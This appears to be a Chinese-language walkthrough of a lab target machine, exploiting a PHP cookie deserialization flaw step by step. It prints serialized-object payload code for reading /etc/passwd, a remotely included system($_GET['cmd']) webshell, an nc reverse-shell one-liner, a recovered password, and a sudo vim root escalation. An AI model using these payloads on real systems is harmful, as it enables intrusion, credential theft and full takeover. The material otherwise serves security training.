阅读量:0
kali靶机配置
【我图片里没有截图的默认配置即可】需要改的地方图片里面都有。
使用kali扫描网关的主机。
扫到一个开放了80端口HTTP协议的主机ip
访问80端口
会看到一个文本页面,翻译一下看是什么意思。。
F12查看cookie,是一个base64编码了的东西
使用burpsuite解码功能解码,发现是一个代码
解码前:
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0=
解码后:
0:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";0:7:"Welcome":0:{}}
使用webshell工具扫描目录
右键将地址添加,扫描后查看到两个目录文件 ,访问一下。。
访问后会看到弹出一个文件下载界面。
进行代码审计
1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。
构造查看文件的payload
将下列的代码保存到自己的www目录下新建成一个php文件
<?php class Log { private $type_log = "/etc/passwd"; } class User { private $name = "admin"; private $wel; function __construct() { $this->wel = new Log(); } } $obj = new User(); echo base64_encode(serialize($obj)); 访问自己构造的payload
也就是访问自己建的payload.php。
查看到了base64编码后的payload。
抓包查看,将user=改为自己构造下的payload
可以看到查到了etc/passwd文件,可以看见sk4用户
再将自己编码后的payload解码
O:4:"User":2:{s:10:"Username";s:5:"admin";s:9:"Userwel";O:3:"Log":1:{s:13:"Logtype_log";s:11:"/etc/passwd";}}<?php class Log { private $type_log = "http://172.16.1.65/3.txt"; } class User { private $name = "admin"; private $wel; function __construct() { $this->wel = new Log(); } } $obj = new User(); echo base64_encode(serialize($obj)); 构造连接cmd的payload
新建一个3.txt里面内容如下:
<?php @system($ GET['cmd']);?>将之前自己www目录下的php文件内容改为如下(地址为自己的本机地址):
将页面显示得到的复制到burpsuite中
结果显示如下
在如图所示的地方写入?cmd=id,显示如下:
添加反弹shell
在?cmd后面添加如下:
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.1.65+4444+>/tmp/f没有反应,但是反弹shell成功。
重新抓包,将抓到的数据包该为自己改成的数据包,放包。
显示如下连接靶机成功:,,,,后续可以进行cmd命令操作靶机。
继续使用cmd命令查看靶机用户的账号密码
用户名sk4 ,密码是:KywZmnPWW6tTbW5w
进行远程连接
ssh sk4@192.168.189.157
输入你查到的密码。。。
sudo vim
提权
提权到了root用户
